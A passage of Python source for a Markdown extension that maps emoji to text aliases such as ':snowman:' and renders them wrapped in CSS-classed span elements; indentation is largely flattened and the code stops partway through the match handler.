'☃': ":frozen: :snowman: :snowmen:".split(),
'⚡': ":lightning: :thunder: :lightning: :bolt: :fast: :zap:".split(),
'🌀': ":swirl: :cloud: :cyclone:".split(),
'🌁': ":fog: :mountain: :foggy:".split(),
'🌊': ":waves: :wave: :tsunami: :disaster: :ocean:".split(),
'🐱': ":meow: :cat:".split(),
'🐶': ":friend: :woof: :puppy: :faithful: :dog:".split(),
'🐭': ":cheese: :mouse:".split(),
'🐹': ":hamster:".split(),
'🐰': ":rabbit:".split(),
'🐺': ":wild: :audrey: :lulu:".split(),
'🐸': ":croak: :frog:".split(),
'🐯': ":cat: :danger: :wild: :roar: :tiger:".split(),
'🐨': ":koala:".split(),
'🐻': ":wild: :bear:".split(),
'🐷': ":oink: :pig:".split(),
'🐽': ":oink: :pig_nose:".split(),
'🐮': ":beef: :ox: :moo: :milk: :cow:".split(),
'🐗': ":boar:".split(),
'🐵': ":ape: :monkey_face:".split(),
'🐒': ":ape: :monkey:".split(),
'🐴': ":brown: :unicorn: :horse:".split(),
'🐎': ":gamble: :luck: :racehorse:".split(),
'🐫': ":desert: :hump: :camel:".split(),
'🐑': ":wool: :shipit: :sheep:".split(),
'🐘': ":nose: :thailand: :elephant:".split(),
'🐼': ":panda_face:".split(),
'🐍': ":serpent: :evil: :hiss: :snake:".split(),
'🐦': ":fly: :tweet: :bird:".split(),
'🐤': ":baby_chick:".split(),
'🐥': ":baby: :hatched_chick:".split(),
'🐣': ":bird-egg: :egg: :born: :baby: :hatching_chick:".split(),
'🐔': ":cluck: :chicken:".split(),
'🐧': ":penguin:".split(),
'🐢': ":tortoise: :turtle:".split(),
'🐛': ":worm: :bug:".split(),
'🐝': ":honeybee:".split(),
'🐜': ":insect: :ant:".split(),
'🐞': ":beetle:".split(),
'🐌': ":slow: :shell: :snail:".split(),
'🐙': ":creature: :octopus:".split(),
'🐠': ":swim: :nemo: :tropical_fish:".split(),
'🐟': ":fish:".split(),
'🐳': ":whale:".split(),
'🐬': ":fish: :flipper: :fins: :dolphin:".split(),
'🐏': ":sheep: :ram:".split(),
'🐀': ":mouse: :rodent: :rat:".split(),
'🐃': ":ox: :cow: :water_buffalo:".split(),
'🐉': ":dragon:".split(),
'🐐': ":goat:".split(),
'🐓': ":rooster:".split(),
'🐂': ":cow: :beef: :ox:".split(),
'🐲': ":dragon_face:".split(),
'🐡': ":blowfish:".split(),
'🐊': ":alligator: :reptile: :crocodile:".split(),
'🐪': ":desert: :hump: :dromedary_camel:".split(),
'🐆': ":leopard:".split(),
'🐩': ":dog: :101: :poodle:".split(),
'💐': ":bouquet:".split(),
'🌸': ":flower: :cherry_blossom:".split(),
'🌷': ":tulip:".split(),
'🍀': ":lucky: :four_leaf_clover:".split(),
'🌹': ":rose:".split(),
'🌻': ":fall: :sunflower:".split(),
'🌺': ":beach: :hibiscus:".split(),
'🍁': ":canada: :fall: :maple_leaf:".split(),
'🍃': ":tree: :grass: :lawn: :leaves:".split(),
'🍂': ":leaves: :fallen_leaf:".split(),
'🌿': ":medicine: :weed: :grass: :lawn: :herb:".split(),
'🍄': ":mushroom:".split(),
'🌵': ":cactus:".split(),
'🌴': ":beach: :palm_tree:".split(),
'🌲': ":evergreen_tree:".split(),
'🌳': ":deciduous_tree:".split(),
'🌰': ":squirrel: :chestnut:".split(),
'🌱': ":grass: :lawn: :seedling:".split(),
'🌼': ":blossom:".split(),
'🌾': ":ear_of_rice:".split(),
'🐚': ":beach: :shell:".split(),
'🌐': ":earth: :international: :world: :internet: :interweb: :i18n: :globe_with_meridians:".split(),
'🌞': ":sky: :sun_with_face:".split(),
'🌝': ":full_moon_with_face:".split(),
'🌚': ":new_moon_with_face:".split(),
'🌑': ":new_moon:".split(),
'🌒': ":waxing_crescent_moon:".split(),
'🌓': ":first_quarter_moon:".split(),
'🌔': ":waxing_gibbous_moon:".split(),
'🌕': ":full_moon:".split(),
              '🌖': ":waning_gibbous_moon:".split(),
'🌗': ":last_quarter_moon:".split(),
'🌘': ":waning_crescent_moon:".split(),
'🌜': ":last_quarter_moon_with_face:".split(),
'🌛': ":first_quarter_moon_with_face:".split(),
'🌙': ":night: :sleep: :sky: :evening: :crescent_moon:".split(),
'🌍': ":europe: :emea: :globe: :world: :international: :earth_africa:".split(),
'🌎': ":globe: :world: :USA: :international: :earth_americas:".split(),
'🌏': ":globe: :world: :east: :international: :earth_asia:".split(),
'🌋': ":disaster: :volcano:".split(),
'🌌': ":space: :stars: :milky_way:".split(),
'⛅': ":cloudy: :fall: :partly_sunny:".split(),
'🎍': ":panda: :bamboo:".split(),
'💝': ":gift_heart:".split(),
'🎎': ":toy: :kimono: :dolls:".split(),
'🎒': ":student: :education: :bag: :school_satchel:".split(),
'🎓': ":edu: :university: :college: :degree: :graduation: :cap: :hat: :learn: :education: :mortar_board:".split(),
'🎏': ":fish: :koinobori: :carp: :banner: :flags:".split(),
'🎆': ":carnival: :congratulations: :fireworks:".split(),
'🎇': ":stars: :night: :sparkler:".split(),
'🎐': ":ding: :bell: :wind_chime:".split(),
'🎑': ":japan: :asia: :tsukimi: :rice_scene:".split(),
'🎃': ":halloween: :light: :pumpkin: :creepy: :fall: :jack_o_lantern:".split(),
'👻': ":boom: :halloween: :spooky: :scary: :ghost:".split(),
'🎅': ":xmas: :christmas: :santa:".split(),
'🎄': ":december: :celebration: :christmas_tree:".split(),
'🎁': ":present: :gift:".split(),
'🔔': ":notification: :chime: :bell:".split(),
'🔕': ":mute: :quiet: :silent: :no_bell:".split(),
'🎋': ":branch: :tanabata_tree:".split(),
              '🎉': ":congratulations: :tada:".split(),
'🎊': ":celebration: :confetti_ball:".split(),
'🎈': ":celebration: :balloon:".split(),
'🔮': ":disco: :fortune_teller: :crystal_ball:".split(),
'💿': ":dvd: :disk: :disc: :cd:".split(),
'📀': ":cd: :disk: :disc: :dvd:".split(),
'💾': ":floppy_disk:".split(),
'📷': ":gadgets: :camera:".split(),
'📹': ":film: :record: :video_camera:".split(),
'🎥': ":film: :record: :movie_camera:".split(),
'💻': ":tech: :laptop: :screen: :display: :monitor: :computer:".split(),
'📺': ":television: :program: :show: :tv:".split(),
'📱': ":apple: :gadgets: :dial: :iphone:".split(),
              '☎': ":dial: :calling: :telephone: :phone:".split(),
'📞': ":dial: :telephone_receiver:".split(),
'📟': ":bbcall: :pager:".split(),
'📠': ":fax:".split(),
'💽': ":data: :disk: :minidisc:".split(),
'📼': ":record: :video: :vhs:".split(),
'🔉': ":loud: :noise: :speaker: :broadcast: :sound:".split(),
'🔈': ":silence: :broadcast: :speaker:".split(),
'🔇': ":silence: :quiet: :mute:".split(),
'📢': ":loudspeaker:".split(),
'📣': ":speaker: :mega:".split(),
'⌛': ":time: :clock: :limit: :exam: :quiz: :test: :hourglass:".split(),
'⏳': ":time: :countdown: :hourglass_flowing_sand:".split(),
'⏰': ":time: :wake: :alarm_clock:".split(),
'⌚': ":clock: :time: :watch:".split(),
'📻': ":podcast: :program: :radio:".split(),
'📡': ":future: :radio: :space: :satellite:".split(),
'➿': ":tape: :cassette: :loop:".split(),
'🔍': ":magnifying: :glass: :search: :zoom: :find: :detective: :mag:".split(),
'🔎': ":mag_right:".split(),
'🔓': ":privacy: :unlock:".split(),
'🔒': ":password: :padlock: :lock:".split(),
'🔏': ":secret: :lock_with_ink_pen:".split(),
'🔐': ":closed_lock_with_key:".split(),
'🔑': ":lock: :door: :password: :key:".split(),
'💡': ":light: :electricity: :idea: :bulb:".split(),
'🔦': ":dark: :camping: :sight: :night: :flashlight:".split(),
'🔆': ":light: :high_brightness:".split(),
'🔅': ":afternoon: :warm: :low_brightness:".split(),
'🔌': ":charger: :power: :electric_plug:".split(),
'🔋': ":power: :energy: :sustain: :battery:".split(),
'📲': ":iphone: :incoming: :calling:".split(),
              '✉': ":postal: :letter: :message: :envelope:".split(),
'📫': ":inbox: :mailbox:".split(),
'📮': ":envelope: :postbox:".split(),
'🛀': ":clean: :shower: :bathroom: :bath:".split(),
'🛁': ":clean: :shower: :bathroom: :bathtub:".split(),
'🚿': ":clean: :bathroom: :shower:".split(),
'🚽': ":restroom: :wc: :washroom: :bathroom: :potty: :toilet:".split(),
'🔧': ":diy: :ikea: :fix: :maintainer: :wrench:".split(),
'🔩': ":handy: :fix: :nut_and_bolt:".split(),
'🔨': ":verdict: :judge: :done: :ruling: :gavel: :hammer:".split(),
'💺': ":sit: :airplane: :transport: :bus: :flight: :fly: :seat:".split(),
'💰': ":payment: :coins: :sale: :moneybag:".split(),
'💴': ":currency: :yen:".split(),
'💵': ":bill: :currency: :dollar:".split(),
'💷': ":sterling: :bills: :england: :currency: :pound:".split(),
'💶': ":currency: :euro:".split(),
'💳': ":payment: :credit_card:".split(),
'💸': ":bills: :payment: :sale: :money_with_wings:".split(),
              '📧': ":send: :e-mail:".split(),
'📥': ":inbox_tray:".split(),
'📤': ":inbox: :outbox_tray:".split(),
'📨': ":inbox: :incoming_envelope:".split(),
'📯': ":postal_horn:".split(),
'📪': ":inbox: :mailbox_closed:".split(),
'📬': ":mailbox_with_mail:".split(),
'📭': ":mailbox_with_no_mail:".split(),
'📦': ":box: :gift: :cardboard: :moving: :package:".split(),
'🚪': ":house: :entry: :exit: :door:".split(),
'🚬': ":smoke: :kills: :tobacco: :cigarette: :joint: :smoking:".split(),
'💣': ":boom: :explode: :explosion: :terrorism: :bomb:".split(),
'🔫': ":violence: :pistol: :revolver: :gun:".split(),
'🔪': ":knife: :blade: :cutlery: :kitchen: :hocho:".split(),
'💊': ":medicine: :doctor: :pharmacy: :drug: :pill:".split(),
'💉': ":hospital: :drugs: :blood: :medicine: :needle: :doctor: :nurse: :syringe:".split(),
'📄': ":paper: :information: :page_facing_up: :documents:".split(),
'📃': ":page_with_curl:".split(),
'📑': ":favorite: :order: :tidy: :bookmark_tabs:".split(),
'📊': ":bar_chart:".split(),
'📈': ":recovery: :success: :chart_with_upwards_trend:".split(),
'📉': ":recession: :failure: :chart_with_downwards_trend:".split(),
'📜': ":ancient: :history: :scroll:".split(),
'📋': ":clipboard:".split(),
'📆': ":schedule: :date: :planning: :calendar:".split(),
'📅': ":calendar: :date:".split(),
'📇': ":card_index:".split(),
'📁': ":file_folder:".split(),
'📂': ":load: :open_file_folder:".split(),
'✂': ":cut: :scissors:".split(),
'📌': ":mark: :here: :pushpin:".split(),
'📎': ":paperclip:".split(),
'✒': ":pen: :writing: :write: :black_nib:".split(),
'📏': ":calculate: :length: :drawing: :architect: :sketch: :straight_ruler:".split(),
'📐': ":architect: :sketch: :triangular_ruler:".split(),
'📕': ":learn: :closed_book:".split(),
'📗': ":study: :green_book:".split(),
'📘': ":learn: :study: :blue_book:".split(),
'📙': ":study: :orange_book:".split(),
'📓': ":record: :notes: :study: :notebook:".split(),
'📔': ":classroom: :notes: :record: :study: :notebook_with_decorative_cover:".split(),
'📒': ":notes: :ledger:".split(),
'📚': ":literature: :study: :books:".split(),
'🔖': ":favorite: :label: :bookmark:".split(),
'📛': ":fire: :forbid: :name_badge:".split(),
'🔬': ":laboratory: :experiment: :zoomin: :science: :study: :microscope:".split(),
'🔭': ":stars: :space: :zoom: :telescope:".split(),
'📰': ":press: :headline: :newspaper:".split(),
'🏈': ":football:".split(),
'🏀': ":basketball:".split(),
'⚽': ":football: :fifa: :soccer:".split(),
'⚾': ":baseball:".split(),
'🎾': ":tennis:".split(),
'🏉': ":team: :rugby_football:".split(),
'🎳': ":bowling:".split(),
'⛳': ":flag: :hole: :golf:".split(),
'🚵': ":race: :bike: :mountain_bicyclist:".split(),
'🚴': ":bike: :exercise: :hipster: :bicyclist:".split(),
'🏇': ":betting: :competition: :gambling: :luck: :horse_racing:".split(),
'🏂': ":snowboarder:".split(),
'🏊': ":exercise: :athlete: :swimmer:".split(),
'🏄': ":beach: :surfer:".split(),
'🎿': ":snow: :ski:".split(),
'♠': ":spades:".split(),
'♥': ":hearts:".split(),
'♣': ":clubs:".split(),
'♦': ":diamonds:".split(),
'💎': ":ruby: :diamond: :jewelry: :gem:".split(),
'💍': ":wedding: :propose: :marriage: :diamond: :jewelry: :gem: :ring:".split(),
'🏆': ":win: :award: :contest: :place: :ftw: :ceremony: :trophy:".split(),
'🎼': ":treble: :clef: :musical_score:".split(),
'🎹': ":piano: :musical_keyboard:".split(),
'🎻': ":orchestra: :symphony: :violin:".split(),
'👾': ":arcade: :space_invader:".split(),
'🎮': ":controller: :console: :PS4: :video_game:".split(),
'🃏': ":poker: :cards: :black_joker:".split(),
'🎴': ":sunset: :flower_playing_cards:".split(),
'🎲': ":dice: :random: :tabbletop: :luck: :game_die:".split(),
'🎯': ":dart:".split(),
'🀄': ":kanji: :mahjong:".split(),
'🎬': ":movie: :film: :record: :clapper:".split(),
              '📝': ":writing: :exam: :quiz: :test: :study: :write: :memo: :pencil:".split(),
'📖': ":open_book: :literature: :learn: :study: :book:".split(),
'🎨': ":design: :paint: :draw: :art:".split(),
'🎤': ":PA: :microphone:".split(),
'🎧': ":gadgets: :headphones:".split(),
'🎺': ":brass: :trumpet:".split(),
'🎷': ":jazz: :blues: :saxophone:".split(),
'🎸': ":guitar:".split(),
              '👞': ":shoes: :mans_shoe:".split(),
'👠': ":pumps: :stiletto: :high_heel:".split(),
'💄': ":lipstick:".split(),
'👢': ":shoes: :boot:".split(),
              '👕': ":formal: :casual: :tee:".split(),
'👔': ":shirt: :suitup: :formal: :necktie:".split(),
'👚': ":womans_clothes:".split(),
'👗': ":clothes: :dress:".split(),
'🎽': ":pageant: :running_shirt_with_sash:".split(),
'👖': ":jeans:".split(),
'👘': ":dress: :kimono:".split(),
'👙': ":swimming: :bikini:".split(),
'🎀': ":decoration: :bowtie: :ribbon:".split(),
'🎩': ":magic: :gentleman: :classy: :tophat:".split(),
'👑': ":king: :kod: :leader: :royalty: :lord: :crown:".split(),
'👒': ":lady: :womans_hat:".split(),
'🌂': ":drizzle: :closed_umbrella:".split(),
'💼': ":work: :briefcase:".split(),
'👜': ":accessory: :handbag:".split(),
'👝': ":bag: :pouch:".split(),
'👛': ":pocketbook: :purse:".split(),
'👓': ":eyesight: :nerd: :dork: :geek: :eyeglasses:".split(),
'🎣': ":hobby: :fishing_pole_and_fish:".split(),
'☕': ":cafe: :espresso: :coffee:".split(),
'🍵': ":bowl: :tea:".split(),
'🍶': ":wine: :drunk: :sake:".split(),
'🍼': ":container: :milk: :baby_bottle:".split(),
'🍺': ":relax: :drunk: :pub: :beer:".split(),
'🍻': ":beers:".split(),
'🍸': ":booze: :cocktail:".split(),
'🍹': ":tropical_drink:".split(),
'🍷': ":drunk: :wine_glass:".split(),
'🍴': ":cutlery: :kitchen: :fork_and_knife:".split(),
'🍕': ":pizza:".split(),
              '🍔': ":meat: :fast_food: :beef: :cheeseburger: :mcdonalds: :burger: :king:".split(),
              '🍟': ":chips: :fast_food: :fries:".split(),
'🍗': ":drumstick: :turkey: :poultry_leg:".split(),
'🍖': ":good: :drumstick: :meat_on_bone:".split(),
'🍝': ":noodles: :noodle: :spaghetti:".split(),
'🍛': ":indian: :spicy: :curry:".split(),
'🍤': ":seafood: :appetizer: :fried_shrimp:".split(),
'🍱': ":box: :bento:".split(),
'🍣': ":fish: :rice: :sushi:".split(),
              '🍥': ":seafood: :naruto: :japan: :fish_cake:".split(),
'🍙': ":rice_ball:".split(),
'🍘': ":rice_cracker:".split(),
'🍚': ":china: :asian: :rice:".split(),
'🍜': ":noodles: :noodle: :chipsticks: :ramen:".split(),
'🍲': ":soup: :stew:".split(),
'🍢': ":oden:".split(),
'🍡': ":barbecue: :dango:".split(),
'🍳': ":kitchen: :egg:".split(),
'🍞': ":toast: :bread:".split(),
'🍩': ":donut: :doughnut:".split(),
'🍮': ":custard:".split(),
'🍦': ":icecream:".split(),
'🍨': ":ice_cream:".split(),
'🍧': ":shaved_ice:".split(),
'🎂': ":cake: :celebration: :birthday:".split(),
'🍰': ":cake:".split(),
'🍪': ":oreo: :chocolate: :cookie:".split(),
'🍫': ":chocolate_bar:".split(),
'🍬': ":candy:".split(),
'🍭': ":lollipop:".split(),
'🍯': ":bees: :kitchen: :honey_pot:".split(),
'🍎': ":mac: :apple:".split(),
'🍏': ":green_apple:".split(),
'🍊': ":tangerine:".split(),
'🍋': ":lemon:".split(),
'🍒': ":cherries:".split(),
'🍇': ":wine: :grapes:".split(),
'🍉': ":picnic: :watermelon:".split(),
'🍓': ":strawberry:".split(),
'🍑': ":peach:".split(),
'🍈': ":melon:".split(),
'🍌': ":banana:".split(),
'🍐': ":pear:".split(),
'🍍': ":pineapple:".split(),
'🍠': ":sweet_potato:".split(),
'🍆': ":aubergine: :eggplant:".split(),
'🍅': ":tomato:".split(),
'🌽': ":corn:".split(),
'🏠': ":house:".split(),
'🏡': ":house_with_garden:".split(),
'🏫': ":student: :education: :learn: :teach: :school:".split(),
'🏢': ":unit: :bureau: :office:".split(),
'🏣': ":post_office:".split(),
'🏥': ":surgery: :doctor: :hospital:".split(),
'🏦': ":cash: :enterprise: :bank:".split(),
'🏪': ":groceries: :convenience_store:".split(),
'🏩': ":dating: :love_hotel:".split(),
'🏨': ":whotel: :accomodation: :checkin: :hotel:".split(),
'💒': ":couple: :marriage: :bride: :groom: :church: :wedding:".split(),
'⛪': ":religion: :christ: :church:".split(),
'🏬': ":mall: :department_store:".split(),
'🏤': ":european_post_office:".split(),
'🌇': ":good_morning: :dawn: :city_sunrise:".split(),
'🌆': ":evening: :sky: :buildings: :city_sunset:".split(),
'🏯': ":asia: :japanese_castle:".split(),
'🏰': ":royalty: :history: :european_castle:".split(),
'⛺': ":camping: :camp: :outdoors: :tent:".split(),
'🏭': ":industry: :pollution: :smoke: :factory:".split(),
'🗼': ":asia: :tokyo_tower:".split(),
'🗾': ":nation: :country: :asia: :island: :japan:".split(),
'🗻': ":mountain: :mount_fuji:".split(),
'🌄': ":view: :sunrise_over_mountains:".split(),
'🌅': ":view: :sunrise:".split(),
'🌠': ":night: :falling: :sky: :bright: :stars:".split(),
'🗽': ":newyork: :monument: :head: :statue_of_liberty:".split(),
'🌉': ":sanfrancisco: :bridge_at_night:".split(),
'🎠': ":carnival: :ride: :carousel_horse:".split(),
'🌈': ":unicorn: :sky: :color: :rainbow:".split(),
'🎡': ":carnival: :londoneye: :ferris_wheel:".split(),
'⛲': ":fresh: :fountain:".split(),
'🎢': ":carnival: :playground: :ride: :roller_coaster:".split(),
'🚢': ":titanic: :deploy: :cruise: :ship:".split(),
'🚤': ":speedboat:".split(),
              '⛵': ":sailing: :boat: :sailboat:".split(),
'🚣': ":hobby: :rowboat:".split(),
'⚓': ":ferry: :boat: :anchor:".split(),
'🚀': ":launch: :staffmode: :NASA: :outer_space: :outer_space: :fly: :rocket:".split(),
'✈': ":flight: :fly: :airplane:".split(),
'🚁': ":fly: :helicopter:".split(),
'🚂': ":train: :steam_locomotive:".split(),
'🚊': ":tram:".split(),
'🚞': ":mountain_railway:".split(),
'🚲': ":bicycle: :exercise: :hipster: :bike:".split(),
'🚡': ":ski: :aerial_tramway:".split(),
'🚟': ":suspension_railway:".split(),
'🚠': ":ski: :mountain_cableway:".split(),
'🚜': ":farming: :agriculture: :tractor:".split(),
'🚙': ":blue_car:".split(),
'🚘': ":oncoming_automobile:".split(),
              '🚗': ":car: :red_car:".split(),
'🚕': ":uber: :taxi:".split(),
'🚖': ":uber: :oncoming_taxi:".split(),
'🚛': ":express: :articulated_lorry:".split(),
'🚌': ":bus:".split(),
'🚍': ":oncoming_bus:".split(),
'🚨': ":police: :ambulance: :911: :emergency: :alert: :error: :pinged: :rotating_light:".split(),
'🚓': ":police_car:".split(),
'🚔': ":911: :oncoming_police_car:".split(),
'🚒': ":fire_engine:".split(),
'🚑': ":911: :hospital: :ambulance:".split(),
'🚐': ":minibus:".split(),
'🚚': ":truck:".split(),
'🚋': ":carriage: :public: :travel: :train:".split(),
'🚉': ":public: :station:".split(),
              '🚆': ":train2:".split(),
'🚅': ":speed: :fast: :public: :travel: :bullettrain_front:".split(),
'🚄': ":bullettrain_side:".split(),
'🚈': ":light_rail:".split(),
'🚝': ":monorail:".split(),
'🚃': ":railway_car:".split(),
'🚎': ":bart: :trolleybus:".split(),
'🎫': ":event: :concert: :pass: :ticket:".split(),
'⛽': ":gasstation: :petroleum: :fuelpump:".split(),
'🚦': ":driving: :vertical_traffic_light:".split(),
'🚥': ":stoplight: :signal: :traffic_light:".split(),
'⚠': ":exclamation: :wip: :alert: :error: :problem: :issue: :warning:".split(),
'🚧': ":wip: :progress: :caution: :warning: :construction:".split(),
'🔰': ":badge: :shield: :beginner:".split(),
'🏧': ":cash: :payment: :bank: :atm:".split(),
'🎰': ":bet: :gamble: :vegas: :machine: :luck: :casino: :slot_machine:".split(),
'🚏': ":wait: :busstop:".split(),
'💈': ":hair: :salon: :style: :barber:".split(),
'♨': ":bath: :warm: :relax: :hotsprings:".split(),
'🏁': ":contest: :finishline: :rase: :gokart: :checkered_flag:".split(),
'🎌': ":nation: :country: :border: :crossed_flags:".split(),
'🏮': ":light: :halloween: :spooky: :izakaya_lantern:".split(),
'🗿': ":easter: :island: :statue: :moyai:".split(),
'🎪': ":carnival: :circus_tent:".split(),
'🎭': ":acting: :theater: :drama: :performing_arts:".split(),
'📍': ":location: :map: :here: :round_pushpin:".split(),
'🚩': ":mark: :milestone: :place: :triangular_flag_on_post:".split(),
'🔣': ":note: :ampersand: :percent: :glyphs: :characters: :symbols:".split(),
'◀': ":left: :arrow_backward:".split(),
'⬇': ":bottom: :arrow_down:".split(),
'▶': ":right: :arrow_forward:".split(),
'⬅': ":previous: :back: :arrow_left:".split(),
'🔠': ":ABCD:".split(),
'🔡': ":abcd:".split(),
'🔤': ":abc:".split(),
'↙': ":arrow_lower_left:".split(),
'↘': ":arrow_lower_right:".split(),
'➡': ":next: :arrow_right:".split(),
'⬆': ":continue: :top: :arrow_up:".split(),
'↖': ":arrow_upper_left:".split(),
'↗': ":arrow_upper_right:".split(),
'⏬': ":arrow_double_down:".split(),
'⏫': ":arrow_double_up:".split(),
'🔽': ":arrow_down_small:".split(),
'⤵': ":arrow_heading_down:".split(),
'⤴': ":arrow_heading_up:".split(),
'↩': ":undo: :leftwards_arrow_with_hook:".split(),
'↪': ":rotade: :arrow_right_hook:".split(),
'↔': ":left_right_arrow:".split(),
'↕': ":way: :arrow_up_down:".split(),
'🔼': ":triangle: :forward: :arrow_up_small:".split(),
'🔃': ":sync: :cycle: :round: :repeat: :arrows_clockwise:".split(),
'🔄': ":arrows_counterclockwise:".split(),
'⏪': ":fast_backward:".split(),
'⏩': ":speed: :continue: :fast_forward:".split(),
'ℹ': ":information_source:".split(),
'🆗': ":OK:".split(),
'🔀': ":shuffle: :random: :twisted_rightwards_arrows:".split(),
'🔁': ":loop: :record: :repeat:".split(),
'🔂': ":repeat_one:".split(),
'🆕': ":start: :new:".split(),
'🔝': ":TOP:".split(),
'🆙': ":above: :high: :UP:".split(),
'🆒': ":COOL:".split(),
'🆓': ":FREE:".split(),
'🆖': ":NG:".split(),
'🎦': ":movie: :record: :film: :cinema:".split(),
'🈁': ":here: :katakana: :destination: :koko:".split(),
'📶': ":reception: :phone: :internet: :connection: :wifi: :bluetooth: :signal_strength:".split(),
'🈂': ":katakana: :sa:".split(),
'🚻': ":toilet: :refresh: :wc: :gender: :restroom:".split(),
'🚹': ":toilet: :restroom: :wc: :gender: :mens:".split(),
'🚺': ":toilet: :loo: :restroom: :gender: :womens:".split(),
'🚼': ":child: :baby_symbol:".split(),
'🚭': ":cigarette: :smell: :smoke: :no_smoking:".split(),
'🅿': ":parking:".split(),
'♿': ":disabled: :a11y: :accessibility: :wheelchair:".split(),
'🚇': ":mrt: :underground: :tube: :metro:".split(),
'🛄': ":airport: :transport: :baggage_claim:".split(),
'🉑': ":good: :kanji: :agree: :yes:".split(),
'🚾': ":toilet: :restroom:".split(),
'🚰': ":liquid: :restroom: :cleaning: :faucet: :potable_water:".split(),
'🚮': ":info: :put_litter_in_its_place:".split(),
'Ⓜ': ":m: :subway:".split(),
'🛂': ":custom:".split(),
'🛅': ":travel: :left_luggage:".split(),
'🛃': ":passport: :border:".split(),
'🉐': ":kanji: :obtain: :get: :circle: :ideograph_advantage:".split(),
'🆘': ":help: :emergency: :911: :sos:".split(),
'🆔': ":id:".split(),
'🚫': ":forbid: :limit: :denied: :disallow: :circle: :no_entry_sign:".split(),
'🔞': ":18: :pub: :night: :minor: :circle: :underage:".split(),
'📵': ":iphone: :mute: :circle: :no_mobile_phones:".split(),
'🚯': ":trash: :bin: :garbage: :circle: :do_not_litter:".split(),
'🚱': ":faucet: :tap: :circle: :non:".split(),
'🚳': ":cyclist: :prohibited: :circle: :no_bicycles:".split(),
'🚷': ":rules: :crossing: :walking: :circle: :no_pedestrians:".split(),
'🚸': ":warning: :danger: :driving:".split(),
'⛔': ":limit: :denied: :circle: :no_entry:".split(),
'❇': ":stars: :fireworks: :sparkle:".split(),
'✴': ":eight_pointed_black_star:".split(),
'💟': ":heart_decoration:".split(),
'📳': ":phone: :vibration_mode:".split(),
'📴': ":mute: :silence: :quiet: :mobile_phone_off:".split(),
'💹': ":yen: :chart:".split(),
'💱': ":travel: :currency_exchange:".split(),
'♈': ":aries:".split(),
'♉': ":taurus:".split(),
'♊': ":gemini:".split(),
'♋': ":cancer:".split(),
'♌': ":leo:".split(),
'♍': ":virgo:".split(),
'♎': ":libra:".split(),
'♏': ":scorpio: :scorpius:".split(),
'♐': ":sagittarius:".split(),
'♑': ":capricorn:".split(),
'♒': ":aquarius:".split(),
'♓': ":pisces:".split(),
'⛎': ":zodiac: :constellation: :astrology: :ophiuchus:".split(),
'🔯': ":religion: :jewish: :hexagram: :six_pointed_star:".split(),
'❎': ":x: :deny: :negative_squared_cross_mark:".split(),
'🅰': ":a:".split(),
'🅱': ":b:".split(),
'🆎': ":ab:".split(),
'💠': ":jewel: :gem: :crystal: :fancy: :diamond_shape_with_a_dot_inside:".split(),
'♻': ":environment: :garbage: :trash: :recycle:".split(),
'🔚': ":end:".split(),
'🔙': ":return: :back:".split(),
'🔛': ":on:".split(),
'🔜': ":soon:".split(),
'💲': ":payment: :currency: :heavy_dollar_sign:".split(),
'©': ":ip: :license: :circle: :copyright:".split(),
'®': ":circle: :registered:".split(),
'™': ":trademark: :brand: :tm:".split(),
'❌': ":no: :delete: :remove: :x:".split(),
'❗': ":shocked: :surprised: :heavy_exclamation_mark:".split(),
'‼': ":exclamation: :surprise: :bangbang:".split(),
'⁉': ":wat: :punctuation: :surprise: :interrobang:".split(),
'⭕': ":circle: :round: :o:".split(),
'✖': ":heavy_multiplication_x:".split(),
'➕': ":addition: :more: :increase: :heavy_plus_sign:".split(),
'➖': ":subtract: :less: :heavy_minus_sign:".split(),
'➗': ":divide: :heavy_division_sign:".split(),
'💮': ":white_flower:".split(),
'✔': ":nike: :heavy_check_mark:".split(),
'☑': ":agree: :confirm: :ballot_box_with_check:".split(),
'🔘': ":input: :old: :circle: :radio_button:".split(),
'🔗': ":rings: :url: :link:".split(),
'➰': ":scribble: :draw: :squiggle: :curly_loop:".split(),
'〰': ":draw: :line: :moustache: :mustache: :squiggle: :scribble: :wavy_dash:".split(),
'〽': ":part_alternation_mark:".split(),
'🔱': ":spear: :trident:".split(),
'▪': ":black_small_square:".split(),
'▫': ":white_small_square:".split(),
'◾': ":black_medium_small_square:".split(),
'◽': ":white_medium_small_square:".split(),
'◼': ":black_medium_square:".split(),
'◻': ":white_medium_square:".split(),
'⬛': ":black_large_square:".split(),
'⬜': ":white_large_square:".split(),
'✅': ":white_check_mark:".split(),
'🔲': ":black_square_button:".split(),
'🔳': ":white_square_button:".split(),
'⚫': ":black_circle:".split(),
'⚪': ":white_circle:".split(),
'🔴': ":red_circle:".split(),
'🔵': ":large_blue_circle:".split(),
'🔷': ":large_blue_diamond:".split(),
'🔶': ":large_orange_diamond:".split(),
'🔹': ":small_blue_diamond:".split(),
'🔸': ":small_orange_diamond:".split(),
'🔺': ":small_red_triangle:".split(),
'🔻': ":small_red_triangle_down:".split(),
}
STYLES = {
'❤': 'color:red',
'💔': 'color:red',
'🍰': 'color:maroon',
'🌰': 'color:maroon',
'🎅': 'color:red',
'🎄': 'color:green',
'☃': 'color:cyan',
}
config = {
'emoji': [
EMOJI,
'A mapping from emoticon symbols to a list of aliases.'
],
'styles': [
STYLES,
'A mapping from emoticon symbol to a CSS style string. '
'Only works if span_class is enabled.'
],
'span_class': [
'emoji',
'A CSS class (default: "emoji") for the emoticons-encompassing '
'<span>. Disabled if None.'
],
}
def __init__(self, *args, **kwargs):
super(UnimojiExtension, self).__init__(*args, **kwargs)
# Set keys as aliases so they get processed the same
for k, v in self.getConfig('emoji').items(): v.append(k)
# Inverse the emoji mapping
aliases = {}
for emoticon, alias in self.getConfig('emoji').items():
for a in alias:
aliases[a] = emoticon
self.config['aliases'] = [aliases, '']
def extendMarkdown(self, md, md_globals):
import re
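# Build one alternation over every known alias; the lookbehind/lookahead
# only allow a match that is delimited by whitespace or text boundaries,
# so an alias never fires inside a longer word.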
RE = r'((?<=\s)|(?<=^))(?P<emoticon>%s)(?=\s|$)' % '|'.join(map(re.escape, self.getConfig('aliases')))
md.inlinePatterns['emoji'] = UnimojiPattern(RE, md, self)
class UnimojiPattern(Pattern):
def __init__(self, pattern, md, extension):
super(UnimojiPattern, self).__init__(pattern, md)
self.ext = extension
def handleMatch(self, m):
# Get the preferred Unicode emoticon, or override
emoticon = self.ext.getConfig('aliases')[m.group('emoticon')]
# Try to parse it as HTML in case it's overridden
element = None
try:
element = etree.fromstring(emoticon.encode('utf-8'))
except etree.ParseError:
pass
# Apply class name if needed
span_class = self.ext.getConfig('span_class')
if span_class:
if element is None:
element = etree.Element('span')
element.text = emoticon
element.set('class', span_class)
